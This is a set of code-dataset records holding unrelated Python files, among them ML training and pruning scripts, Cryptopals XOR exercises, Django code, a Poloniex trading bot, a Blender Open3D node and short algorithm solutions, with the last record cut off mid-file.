test_y_predicted))\n return np.mean(test_loss), np.mean(test_acc), np.mean(test_auc)\n\n def get_shard(data):\n part_size = data.shape[0] // nrank\n start = part_size * rank\n end = start + part_size if rank != nrank - 1 else data.shape[0]\n return data[start:end]\n\n def 
get_partitioned_shard(data):\n if data_arr is not None:\n return data[np.where(data_arr==rank)]\n else:\n return get_shard(data)\n\n batch_size = args.batch_size\n\n nrank = comm.nRanks.value\n\n dense, sparse, labels = load_dataset(args.dataset, val=False)\n has_dense_feature = dense is not None\n dense_input = [[get_partitioned_shard(dense), batch_size, 'train']] if has_dense_feature else None\n sparse_input = [ht.Dataloader(get_partitioned_shard(sparse).astype(np.int64), batch_size, 'train', use_numpy=True)]\n y_ = [[get_partitioned_shard(labels), batch_size, 'train']]\n\n if args.val:\n val_dense, val_sparse, val_labels = load_dataset(args.dataset, val=True)\n if has_dense_feature:\n dense_input.append([get_shard(val_dense), batch_size, 'validate'])\n sparse_input.append(ht.Dataloader(get_shard(val_sparse).astype(np.int64), batch_size, 'validate', use_numpy=True))\n y_.append([get_shard(val_labels), batch_size, 'validate'])\n\n dense_input = ht.dataloader_op(dense_input) if has_dense_feature else None\n sparse_input = ht.dataloader_op(sparse_input)\n y_ = ht.dataloader_op(y_)\n\n print(\"Data loaded.\")\n models = {\"wdl\" : WDL, \"dcn\" : DCN, \"dfm\" : DFM}\n loss, prediction, y_, train_op = models[args.model](args.dataset, dense_input, sparse_input, y_, args.embed_dim, rank, nrank, device_id,\n args.bound, root_arr, storage_arr)\n\n eval_nodes = {'train': [loss, prediction, y_, train_op]}\n if args.val:\n print('Validation enabled...')\n eval_nodes['validate'] = [loss, prediction, y_]\n executor = ht.Executor(eval_nodes, ctx=ht.gpu(device_id), comm_mode=\"AllReduce\" if nrank > 1 else None, seed=123, log_path='./logs/')\n\n if rank == 0:\n log_file = open(args.output, 'w')\n for ep in range(args.iter // args.log_every):\n ep_st = time.time()\n train_loss, train_acc, train_auc = train(args.log_every)\n ep_en = time.time()\n train_time, train_loss, train_acc, train_auc = comm_sync_data(comm, ep_en - ep_st, train_loss, train_acc, train_auc)\n if rank==0:\n printstr = \"TRAIN %d: loss %.4f acc %.4f time %.4f speed %d\" % (ep * args.log_every, train_loss, train_acc, train_time, args.log_every*batch_size/train_time)\n print(printstr, flush=True)\n print(printstr, file=log_file, flush=True)\n if args.val and ep > 0 and ep % (args.eval_every // args.log_every) == 0:\n val_loss, val_acc, val_auc = validate(executor.get_batch_num('validate'))\n val_loss, val_acc, val_auc = comm_sync_data(comm, val_loss, val_acc, val_auc)\n if rank==0:\n printstr = \"EVAL %d: val_loss %.4f val_acc %.4f val_auc %.4f\" % (ep * args.log_every, val_loss, val_acc, val_auc)\n print(printstr, flush=True)\n print(printstr, file=log_file, flush=True)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--dataset\", type=str, required=True, help=\"[criteo avazu company]\")\n parser.add_argument(\"--model\", type=str, required=True, help=\"[wdl dcn dfm]\")\n parser.add_argument(\"--val\", action=\"store_true\", help=\"whether to use validation\")\n parser.add_argument(\"--bound\", type=int, default=10, help=\"cache bound\")\n parser.add_argument(\"--batch_size\", type=int, default=128, help=\"batch size\")\n parser.add_argument(\"--embed_dim\", type=int, default=128, help=\"embedding dim\")\n parser.add_argument(\"--iter\", type=int, default=10000, help=\"nnumber of iteration\")\n parser.add_argument(\"--log_every\", type=int, default=200)\n parser.add_argument(\"--eval_every\", type=int, default=10000)\n parser.add_argument(\"--store_rate\", type=float, default=0.01)\n 
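# Judging from main() below, --partition names an .npz archive that provides 'data_partition'\n    # and 'embed_partition' arrays plus one cached-id array per rank, e.g. (hypothetical):\n    # np.savez('part.npz', data_partition=..., embed_partition=..., **{'0': ...})\n    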
parser.add_argument(\"--partition\", type=str, default=None)\n parser.add_argument(\"--output\", type=str, default=\"hetuctr.log\")\n args = parser.parse_args()\n\n comm, device_id = ht.mpi_nccl_init()\n rank = comm.myRank.value\n if args.partition:\n args.partition = osp.normpath(osp.expanduser(args.partition))\n assert osp.exists(args.partition)\n partition = np.load(args.partition)\n data_arr = partition[\"data_partition\"]\n root_arr = partition[\"embed_partition\"]\n storage_arr = partition[str(rank)]\n storage_arr = storage_arr[:int(args.store_rate * len(storage_arr))]\n storage_arr = np.concatenate([np.where(root_arr==rank)[0], storage_arr])\n else:\n data_arr, root_arr, storage_arr = None, None, None\n\n worker(args)\n ht.mpi_nccl_finish(comm)\n","repo_name":"Hsword/SIGMOD2022_HET-GMP","sub_path":"examples/hetuctr.py","file_name":"hetuctr.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"14619488528","text":"import base64\r\nimport re\r\nimport codecs\r\n\r\ndef convert_hex_to_base64(str=\"cXVlc3Rpb24z\"):\r\n return base64.b64encode(str)\r\n\r\n\r\ndef fixed_xor(str1=\"abcdef\", str2=\"qwerty\"):\r\n str_tmp = []\r\n for i in range(0, len(str1)):\r\n str_tmp += [chr(ord(str1[i]) ^ ord(str2[i]))]\r\n str_tmp = \"\".join(str_tmp)\r\n return codecs.encode(str_tmp)\r\n\r\n\r\ndef single_byte_xor_cipher(input_hex_str=\"1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\"):\r\n highest_score = 0\r\n best_result = ''\r\n best_key = None\r\n\r\n # 转换为字节列表\r\n byte_array = bytearray.fromhex(input_hex_str)\r\n\r\n for i in range(256): # 尝试每个可能的key值\r\n # 解密XOR\r\n decoded_bytes = bytes([b ^ i for b in byte_array])\r\n # 仅计算小写字母的数量,因为大写字母的频率通常较低\r\n score = sum(ord('a') <= byte <= ord('z') for byte in decoded_bytes)\r\n\r\n # 更新最佳得分和对应的结果\r\n if score > highest_score:\r\n highest_score = score\r\n best_result = decoded_bytes.decode('latin1') # 解码为字符串,假设是latin1编码\r\n best_key = chr(i)\r\n\r\n return best_key, best_result\r\n\r\n\r\n# print(single_byte_xor_cipher())\r\nfrom collections import Counter\r\n\r\n\r\ndef detect_single_character_xor(file_name=\"4.txt\"):\r\n highest_score = 0\r\n best_result = ''\r\n key_candidate = ''\r\n original_cipher = ''\r\n\r\n with open(file_name, \"r\") as file:\r\n for line in file:\r\n hex_string = line.strip() # 去除可能的换行符和空白符\r\n for key_value in range(256): # 扩展至256,因为单字节XOR的可能值有256个\r\n # XOR每个可能的字符,并解码成ASCII\r\n decoded_chars = [chr(key_value ^ int(byte_pair, 16)) for byte_pair in re.findall('.{2}', hex_string)]\r\n decoded_string = ''.join(decoded_chars)\r\n\r\n # 使用Counter来计算每个字符的出现频率\r\n frequency = Counter(decoded_string.lower()) # 将字符串转换为小写进行统计\r\n score = sum(frequency.get(c, 0) for c in 'etaoin shrdlu') # 基于字母频率给字符串打分\r\n\r\n # 更新得到更高分的结果\r\n if score > highest_score:\r\n highest_score = score\r\n best_result = decoded_string\r\n key_candidate = chr(key_value)\r\n original_cipher = hex_string\r\n\r\n return original_cipher, key_candidate, best_result\r\n\r\n\r\nprint(\"cXVlc3Rpb24z\")\r\nprint(fixed_xor())\r\nprint(single_byte_xor_cipher())\r\nprint(detect_single_character_xor())\r\n","repo_name":"HumboldtC/XD_CRYPTO","sub_path":"EXP1/3_Cryptopals_set1.py","file_name":"3_Cryptopals_set1.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6399811552","text":"from rest_framework import serializers\nfrom metrics.models import 
Metric, MetricCollection\n\n\nclass MetricSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = Metric\n        fields = (\n            \"time\",\n            \"type\",\n            \"data\",\n        )\n\n\nclass MetricCollectionSerializer(serializers.ModelSerializer):\n    metrics = serializers.SerializerMethodField()\n\n    class Meta:\n        model = MetricCollection\n        fields = (\n            \"type\",\n            \"metrics\",\n        )\n\n    def get_metrics(self, metric_collection):\n        metrics = metric_collection.metrics.all()\n        serializer = MetricSerializer(\n            metrics,\n            many=True,\n        )\n        return serializer.data\n","repo_name":"wizenheimer/Arcadian","sub_path":"metrics/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"31232656842","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"\nLICENSE: MulanPSL2\nAUTHOR: cnhemiya@qq.com\nDATE: 2022-06-05 21:45\nDescription: pruning for image segmentation\n\"\"\"\n\n\nimport paddlex as pdx\nfrom paddlex import transforms as T\nimport mod.utils\nimport mod.args\nimport mod.config as config\n\n\ndef prune():\n    # Parse command-line arguments\n    args = mod.args.PruneXSeg()\n    # Check that the input files and directories exist\n    args.check()\n    # Compute on CUDA GPU or on CPU\n    config.user_cude(not args.cpu)\n\n    # Define the transforms used for training and validation\n    # API reference: https://gitee.com/PaddlePaddle/PaddleX/blob/develop/docs/apis/transforms/transforms.md\n    train_transforms = T.Compose([\n        T.Resize(target_size=512),\n        T.RandomHorizontalFlip(),\n        T.Normalize(\n            mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n    ])\n\n    eval_transforms = T.Compose([\n        T.Resize(target_size=512),\n        T.Normalize(\n            mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),\n    ])\n\n    # Define the datasets used for training and validation\n    # API reference: https://gitee.com/PaddlePaddle/PaddleX/blob/develop/docs/apis/datasets.md\n    train_dataset = pdx.datasets.SegDataset(\n        data_dir=args.dataset,\n        file_list=args.train_list,\n        label_list=args.label_list,\n        transforms=train_transforms,\n        num_workers=args.num_workers,\n        shuffle=True)\n\n    eval_dataset = pdx.datasets.SegDataset(\n        data_dir=args.dataset,\n        file_list=args.eval_list,\n        label_list=args.label_list,\n        transforms=eval_transforms,\n        num_workers=args.num_workers,\n        shuffle=False)\n\n    # Load the model\n    print(\"Loading model ... from: {}\".format(args.model_dir))\n    model = pdx.load_model(args.model_dir)\n\n    # Step 1/3: analyze how sensitive each layer's parameters are to different pruning ratios\n    # Note: pruning object-detection models depends on PaddleSlim 2.1.0\n    # Note: if this step was run before, the existing 'save_dir'/model.sensi.data is loaded\n    # automatically on the second run and the sensitivity analysis is skipped\n    # API reference: https://gitee.com/paddlepaddle/PaddleX/blob/develop/docs/apis/models/semantic_segmentation.md#analyze_sensitivity\n    # Usage reference: https://gitee.com/paddlepaddle/PaddleX/tree/develop/tutorials/slim/prune/semantic_segmentation\n    if not args.skip_analyze:\n        print(\"Sensitivity analysis ... saving to: {}\".format(args.save_dir))\n        model.analyze_sensitivity(\n            dataset=eval_dataset,\n            batch_size=args.batch_size,\n            save_dir=args.save_dir)\n\n    # Step 2/3: prune the model according to the chosen FLOPs reduction ratio\n    # API reference: https://gitee.com/paddlepaddle/PaddleX/blob/develop/docs/apis/models/semantic_segmentation.md#prune\n    # Usage reference: https://gitee.com/paddlepaddle/PaddleX/tree/develop/tutorials/slim/prune/semantic_segmentation\n    print(\"Pruning the model ... FLOPs: {}\".format(args.pruned_flops))\n    model.prune(pruned_flops=args.pruned_flops)\n\n    # Optimizer\n    # https://gitee.com/paddlepaddle/PaddleX/blob/develop/paddlex/cv/models/segmenter.py#L189\n\n    # Model training\n    # API reference: https://gitee.com/paddlepaddle/PaddleX/blob/develop/docs/apis/models/semantic_segmentation.md\n    # Usage reference: https://gitee.com/paddlepaddle/PaddleX/tree/develop/tutorials/slim/prune/semantic_segmentation\n    # Training metrics can be viewed with 
VisualDL, see: https://gitee.com/PaddlePaddle/PaddleX/blob/develop/docs/visualdl.md\n    print(\"Training started ... saving to: {}\".format(args.save_dir))\n    model.train(num_epochs=args.epochs,\n                train_dataset=train_dataset,\n                train_batch_size=args.batch_size,\n                eval_dataset=eval_dataset,\n                save_dir=args.save_dir,\n                save_interval_epochs=args.save_interval_epochs,\n                log_interval_steps=args.log_interval_steps,\n                learning_rate=args.learning_rate,\n                lr_decay_power=args.lr_decay_power,\n                early_stop=args.early_stop,\n                early_stop_patience=args.early_stop_patience,\n                resume_checkpoint=args.resume_checkpoint,\n                pretrain_weights=args.pretrain_weights,\n                use_vdl=True)\n    print(\"Training finished ... saved to: {}\".format(args.save_dir))\n\n\ndef main():\n    # Prune\n    prune()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"cnhemiya/bmm-paddle-helper","sub_path":"templates/paddlex_seg/prune.py","file_name":"prune.py","file_ext":"py","file_size_in_byte":4404,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"33601277158","text":"from __future__ import print_function, division\n\nimport time\nfrom PIL import Image\nfrom torchvision.transforms import transforms\nfrom transforms.pad_to_square import pad_to_square\nimport numpy as np\n\nfrom utils.utils import AverageMeter, accuracy\nfrom utils.img_utils import compute_gradient, save_img\n\n\ndef test(val_loader, model, device, save_imgs=False, show=False):\n    batch_time = AverageMeter()\n\n    eval_fingers_recall = AverageMeter()\n    eval_fingers_precision = AverageMeter()\n\n    eval_frets_recall = AverageMeter()\n    eval_frets_precision = AverageMeter()\n\n    eval_strings_recall = AverageMeter()\n    eval_strings_precision = AverageMeter()\n\n    # switch to evaluate mode\n    model.eval()\n\n    end = time.time()\n\n    for data_idx, data in enumerate(val_loader):\n        input = data['image'].float().to(device)\n        target = data['fingers'].float().to(device)\n        frets = data['frets'].float().to(device)\n        strings = data['strings'].float().to(device)\n        target_coord = data['finger_coord']\n        frets_coord = data['fret_coord']\n        strings_coord = data['string_coord']\n        img_number = data['img_number']\n\n        # compute output\n        output = model(input)\n        output1 = output[0].split(input.shape[0], dim=0)\n        output2 = output[1].split(input.shape[0], dim=0)\n        output3 = output[2].split(input.shape[0], dim=0)\n\n        if show:\n            import matplotlib.pyplot as plt\n            import torchvision.transforms as transforms\n            fig, ax = plt.subplots(1, 3)\n            ax[0].imshow(target[0][0].cpu(), cmap='gray')\n            ax[1].imshow(output1[-1][0][0].cpu().detach(), cmap='gray')\n            ax[2].imshow(transforms.ToPILImage()(input.cpu()[0]))\n            plt.show()\n\n        # measure accuracy\n        accuracy(output=output1[-1].data, target=target,\n                 global_precision=eval_fingers_precision, global_recall=eval_fingers_recall, fingers=target_coord,\n                 min_dist=10)\n\n        accuracy(output=output2[-1].data, target=frets,\n                 global_precision=eval_frets_precision, global_recall=eval_frets_recall,\n                 fingers=frets_coord.unsqueeze(0), min_dist=5)\n\n        accuracy(output=output3[-1].data, target=strings,\n                 global_precision=eval_strings_precision, global_recall=eval_strings_recall,\n                 fingers=strings_coord.unsqueeze(0), min_dist=5)\n\n        if save_imgs:\n            save_img(input.cpu().detach()[0], output1[-1][0][0].cpu().detach().numpy(), 10, 'image{num}_fingers'.format(num=data['img_number'][0]))\n            save_img(input.cpu().detach()[0], output2[-1][0][0].cpu().detach().numpy(), 5, 'image{num}_frets'.format(num=data['img_number'][0]))\n            save_img(input.cpu().detach()[0], 
output3[-1][0][0].cpu().detach().numpy(), 5, 'image{num}_strings'.format(num=data['img_number'][0]))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n print('FINGERS: \\t'\n 'Recall(%): {top1:.3f}\\t'\n 'Precision(%): {top2:.3f}\\n'\n 'FRETS: \\t'\n 'Recall(%): {top6:.3f}\\t'\n 'Precision(%): {top7:.3f}\\n'\n 'STRINGS: \\t'\n 'Recall(%): {top11:.3f}\\t'\n 'Precision(%): {top12:.3f}\\n'\n .format(top1=eval_fingers_recall.avg * 100, top2=eval_fingers_precision.avg * 100,\n top6=eval_frets_recall.avg * 100, top7=eval_frets_precision.avg * 100,\n top11=eval_strings_recall.avg * 100, top12=eval_strings_precision.avg * 100))\n\n return eval_fingers_recall.avg, eval_frets_recall.avg, eval_strings_recall.avg, eval_fingers_precision.avg, \\\n eval_frets_precision.avg, eval_strings_precision.avg","repo_name":"AlbertMitjans/chord-detection","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"32180112672","text":"from lib.common.msg import info, warn\nfrom lib.common.id_map_poloniex import id_to_poloniex\nfrom lib.common.id_ticker_map import id_to_ticker\nfrom lib.common.orderbook import estimate_fill_price, FillPriceEstimate\nfrom lib.trader import poloniex_api\nfrom lib.trader.trader import Trader\n\n# limit price estimate is based on (qty requested) x (overcommit_factor)\novercommit_factor = 1.1\n\nclass PoloniexTraderError(RuntimeError):\n def __init__(self, message: str):\n super().__init__(message)\n\nclass PoloniexTrader(Trader):\n\n @staticmethod\n def handles_sym(sym: str) -> bool:\n return sym in id_to_poloniex.keys()\n\n def __init__(self, sym: str, api_key: str, secret: str):\n self.pair = id_to_poloniex[sym]\n self.ticker = id_to_ticker[sym]\n self.api = poloniex_api.Poloniex(api_key, secret)\n\n def _handle_trade(self, response: dict) -> tuple[float,float]:\n if 'resultingTrades' in response.keys():\n trades = response['resultingTrades']\n total_qty_coin = sum( [float(x['amount']) for x in trades] )\n total_qty_usd = sum( [float(x['total']) for x in trades] )\n fill_price = total_qty_usd / total_qty_coin\n return [fill_price, total_qty_coin]\n elif 'error' in response.keys():\n raise PoloniexTraderError(response['error'])\n else:\n raise PoloniexTraderError(f\"unknown error : {response}\")\n\n\n def buy_market(self, qty: float, qty_in_usd: bool) -> tuple[float,float]:\n self._check_trx_balance()\n if qty_in_usd:\n qty_tokens = qty / self.api.returnTicker(self.pair)\n else:\n qty_tokens = qty\n estimate_price = estimate_fill_price(self.api.returnOrderBook(self.pair)['asks'], qty_tokens*overcommit_factor)\n response = self.api.buy(self.pair, estimate_price.limit, qty_tokens, {'fillOrKill': True})\n return self._handle_trade(response)\n\n def sell_market(self, qty_tokens: float) -> tuple[float,float]:\n self._check_trx_balance()\n estimate_price = estimate_fill_price(self.api.returnOrderBook(self.pair)['bids'], qty_tokens*overcommit_factor)\n response = self.api.sell(self.pair, estimate_price.limit, qty_tokens, {'fillOrKill': True})\n return self._handle_trade(response)\n\n def sell_limit(self, qty_tokens: float, limit_price: float, auto_top_up_commission_tokens: bool = False) -> tuple[float,float]:\n if auto_top_up_commission_tokens:\n self._check_trx_balance()\n response = self.api.sell(self.pair, limit_price, qty_tokens, {'fillOrKill': True, 'immediateOrCancel': True})\n return 
self._handle_trade(response)\n\n\n def estimate_fill_price(self, qty: float, side: str) -> FillPriceEstimate:\n assert side in [\"buy\", \"sell\"]\n if side == \"buy\":\n return estimate_fill_price(self.api.returnOrderBook(self.pair)['asks'], qty*overcommit_factor)\n else:\n return estimate_fill_price(self.api.returnOrderBook(self.pair)['bids'], qty*overcommit_factor)\n\n def get_available_qty(self) -> float:\n return float(self.api.returnBalances()[self.ticker])\n\n def _check_trx_balance(self):\n qty = float(self.api.returnBalances()['TRX'])\n market_price = float(self.api.returnOrderBook(\"USDT_TRX\")['asks'][1][0])\n if qty * market_price < 50:\n add_qty = round(10 / market_price)\n info(f\"PoloniexTrader: buying {add_qty:.1f} additional TRX tokens\")\n self.api.buy(\"USDT_TRX\", market_price*1.01, add_qty, {'fillOrKill': True})\n new_qty = float(self.api.returnBalances()['TRX'])\n if new_qty < add_qty:\n warn(\"PoloniexTrader: failed to buy TRX tokens\")\n","repo_name":"AbigalChulchill/investment-utils","sub_path":"lib/trader/poloniex_trader.py","file_name":"poloniex_trader.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"25522074669","text":"import sys\n\n\ndef dfs(cnt):\n global N, M, num_list, visited\n\n if cnt == M:\n sys.stdout.write(' '.join(answer) + '\\n')\n return\n\n for i in range(N):\n if not visited[i]:\n visited[i] = 1\n answer.append(str(num_list[i]))\n dfs(cnt+1)\n visited[i] = 0\n answer.pop()\n\n\nif __name__ == '__main__':\n N, M = map(int, input().split())\n num_list = sorted(list(map(int, sys.stdin.readline().split())))\n visited = [0 for _ in range(N)]\n answer = []\n\n dfs(0)","repo_name":"jjungyeun/AlgorithmStudy2021","sub_path":"Baekjoon/2106/15654.py","file_name":"15654.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6326336893","text":"\nimport copy\nimport bpy\nfrom bpy.props import EnumProperty, IntProperty\nfrom mathutils import Matrix\n\nimport sverchok\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.data_structure import updateNode\nfrom sverchok.utils.nodes_mixins.recursive_nodes import SvRecursiveNode\n\nfrom sverchok_open3d.dependencies import open3d as o3d\nfrom sverchok.utils.dummy_nodes import add_dummy\n\nif o3d is None:\n add_dummy('SvO3TriangleMeshSamplingNode', 'Triangle Mesh Sampling', 'open3d')\nelse:\n class SvO3TriangleMeshSamplingNode(bpy.types.Node, SverchCustomTreeNode, SvRecursiveNode):\n \"\"\"\n Triggers: O3D Mesh Sampling\n Tooltip: Points over Open3d mesh. 
Mesh to Point Cloud\n \"\"\"\n bl_idname = 'SvO3TriangleMeshSamplingNode'\n bl_label = 'Triangle Mesh Sampling'\n bl_icon = 'MESH_DATA'\n sv_icon = 'SV_RANDOM_NUM_GEN'\n methods = [\n ('UNIFORM', \"Uniform\", \"Uniform Sampling\", 0),\n ('POISSON', \"Poisson Disk\", \"Poisson Disk Sampling\", 1),\n ]\n normal_methods = [\n ('TRIANGLES', \"From Faces\", \"Calculate Normals From Faces\", 0),\n ('VERTEX', \"From Vertex\", \"Calculate Normals From Vertices\", 1),\n ('NONE', \"None\", \"If mesh does not have normals, the point cloud will not have normals\", 2),\n ]\n\n method: EnumProperty(\n name=\"Method\",\n items=methods,\n default='POISSON',\n update=updateNode)\n normal_method: EnumProperty(\n name=\"Normal\",\n items=normal_methods,\n default='TRIANGLES',\n update=updateNode)\n\n num_points: IntProperty(\n name=\"Point Number\",\n default=100,\n update=updateNode)\n init_factor: IntProperty(\n name=\"Init Factor\",\n description='Initial Points will be Init Factor X Number of points ',\n default=5,\n update=updateNode)\n seed: IntProperty(\n name=\"Seed\",\n description='Random Seed Value, -1 to use a different every update',\n default=1,\n update=updateNode)\n\n def sv_init(self, context):\n self.inputs.new('SvO3TriangleMeshSocket', \"O3D Triangle Mesh\").is_mandatory = True\n num_points = self.inputs.new('SvStringsSocket', \"Points Number\")\n num_points.prop_name = 'num_points'\n num_points.nesting_level = 1\n num_points.pre_processing = 'ONE_ITEM'\n seed = self.inputs.new('SvStringsSocket', \"Seed\")\n seed.prop_name = 'seed'\n seed.nesting_level = 1\n seed.pre_processing = 'ONE_ITEM'\n\n self.outputs.new('SvO3PointCloudSocket', 'O3D Point Cloud')\n\n def draw_buttons(self, context, layout):\n layout.prop(self, 'method')\n layout.prop(self, 'normal_method')\n\n def draw_buttons_ext(self, context, layout):\n layout.prop(self, 'list_match')\n self.draw_buttons(context, layout)\n if self.method == 'POISSON':\n layout.prop(self, 'init_factor')\n\n def rclick_menu(self, context, layout):\n layout.prop_menu_enum(self, \"list_match\", text=\"List Match\")\n\n def process_data(self, params):\n\n pcd_out = []\n\n for mesh, points_num, seed in zip(*params):\n\n if self.normal_method == 'TRIANGLES':\n use_triangle_normal = True\n elif self.normal_method == 'VERTEX':\n use_triangle_normal = False\n mesh = copy.deepcopy(mesh)\n mesh.compute_vertex_normals()\n else:\n use_triangle_normal = False\n if self.method == 'POISSON':\n pcd = mesh.sample_points_poisson_disk(\n points_num,\n init_factor=self.init_factor,\n use_triangle_normal=use_triangle_normal,\n seed=seed)\n else:\n pcd = mesh.sample_points_uniformly(\n number_of_points=points_num,\n use_triangle_normal=use_triangle_normal,\n seed=seed)\n pcd_out.append(pcd)\n\n return pcd_out\n\n\n\ndef register():\n if o3d is not None:\n bpy.utils.register_class(SvO3TriangleMeshSamplingNode)\n\ndef unregister():\n if o3d is not None:\n bpy.utils.unregister_class(SvO3TriangleMeshSamplingNode)\n","repo_name":"vicdoval/sverchok-open3d","sub_path":"nodes/triangle_mesh/triangle_mesh_sampling.py","file_name":"triangle_mesh_sampling.py","file_ext":"py","file_size_in_byte":4544,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"18"} +{"seq_id":"35885001249","text":"import requests\nfrom lxml import html\nimport urllib\n\nid = 152293\ndomain = 'https://www.russianfood.com/recipes/recipe.php?rid='\n\ndef getContent(id):\n\n url = domain + str(id)\n\n print('getContent(): send request to %s' % url)\n try:\n r = 
requests.get(url, timeout=30)\n except Exception as e:\n print(e)\n\n content = ''\n if r.reason == 'OK':\n print('getContent(): status OK')\n \n content = r.text\n \n return content\n\ndef get_products(content):\n tree = html.fromstring(content)\n\n products = []\n for element in tree.xpath('//td[@class=\"padding_l padding_r\"]/span'):\n product = element.text.lower()\n if '-' in product:\n product = product.split(' - ')[0]\n\n products.append(product)\n\n return products\n\ndef get_label(content):\n tree = html.fromstring(content)\n\n label = None\n for element in tree.xpath('//span[@class=\"rcp\"]'):\n label = element.text\n return label\n\ndef get_text(content):\n tree = html.fromstring(content)\n\n text = ''\n for element in tree.xpath('//div[@class=\"step_n\"]/p'):\n text += element.text + ' '\n return text","repo_name":"kuznetsov-m/Datamonetize-hack","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"25016010355","text":"#!/Users/htlin/.pyenv/versions/automator/bin/python\n# -*- coding: utf-8 -*-\n# title: tweet\n# date: \"2023-03-25\"\n# @raycast.title Tweet\n# @raycast.author HTLin the 🦎\n# @raycast.authorURL https://github.com/htlin222\n# @raycast.description\n\n# @raycast.icon 🐦\n# @raycast.mode silent\n# @raycast.packageName System\n# @raycast.schemaVersion 1\n\nimport os\nimport yaml\nimport tweepy\nfrom pathlib import Path\n\n# Get path to home directory\nhome_dir = str(Path.home())\n\n# Define path to YAML file\nyaml_path = os.path.join(home_dir, 'KEY', 'twitter.yaml')\n\n# Load API keys and access tokens from YAML file\nwith open(yaml_path, 'r') as file:\n config = yaml.safe_load(file)\n\nconsumer_key = config['consumer_key']\nconsumer_secret = config['consumer_secret']\naccess_token = config['access_token']\naccess_token_secret = config['access_token_secret']\n\n# Authenticate with Twitter API\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\n\n# Create API object\napi = tweepy.API(auth)\n\n# Create a tweet\napi.update_status(\"Hello Tweepy\")\n","repo_name":"htlin222/dotfiles","sub_path":"pyscripts.symlink/tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"44570018640","text":"from django.http import HttpResponse, Http404\nfrom datetime import datetime, timedelta\nfrom django.shortcuts import render\nfrom django.template import loader\n\n\ndef hello(request):\n return HttpResponse('hello, world')\n\n\ndef hours_head(request, offset):\n try:\n offset = int(offset)\n except ValueError:\n raise Http404\n dt = datetime.now() + timedelta(hours=offset)\n html = 'In {}hours, it will be {}.'.format(offset, dt)\n return HttpResponse(html)\n\n\ndef current_datetime(request):\n now = datetime.now()\n t = loader.get_template('current_datetime.html')\n print(request.path)\n print(request.get_host())\n print(request.get_full_path())\n print(request.is_secure())\n values = request.META.items()\n html = []\n for k, v in values:\n html.append((k, v))\n c = {\n 'now': now,\n 'html': html,\n }\n return HttpResponse(t.render(c, request))\n\n\n\ndef searh_form(request):\n return render(request, 
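\n        # template name mirrors the view function name 'searh_form' (sic)\n        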
'searh_form.html')\n","repo_name":"hdguodada/djangobook","sub_path":"mysite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72463613162","text":"# Chicken Delivery (the order does not affect the result, so use combinations)\nfrom itertools import combinations\n\n\ndef get_sum(location_home, case):\n    result = 0\n    for x1, y1 in location_home:\n        temp = int(1e9)\n        for x2, y2 in case:\n            temp = min(temp, abs(x1 - x2) + abs(y1 - y2))\n        result += temp\n    return result\n\n\nn, m = map(int, input().split())\ngraph = []\nlocation_home = []\nlocation_chicken = []\nfor i in range(n):\n    data = list(map(int, input().split()))\n    graph.append(data)\n    for j in range(n):\n        if data[j] == 1:\n            location_home.append((i, j))\n        elif data[j] == 2:\n            location_chicken.append((i, j))\n\ncases = combinations(location_chicken, m)\nresult = int(1e9)\nfor case in cases:\n    result = min(result, get_sum(location_home, case))\n\nprint(result)\n","repo_name":"Dong-Jun-Shin/Study_Algorithm_Python","sub_path":"Coding_test/practice_turn_2/02_implementation/prac_turn2_Q_13.py","file_name":"prac_turn2_Q_13.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23864039380","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Recommendation',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('name', models.CharField(max_length=255, null=True)),\n                ('info', models.TextField(null=True)),\n                ('map_img', models.ImageField(upload_to=b'maps', blank=True)),\n                ('image', models.ImageField(upload_to=b'recommendations')),\n                ('phone_number', models.CharField(max_length=13, null=True)),\n            ],\n        ),\n    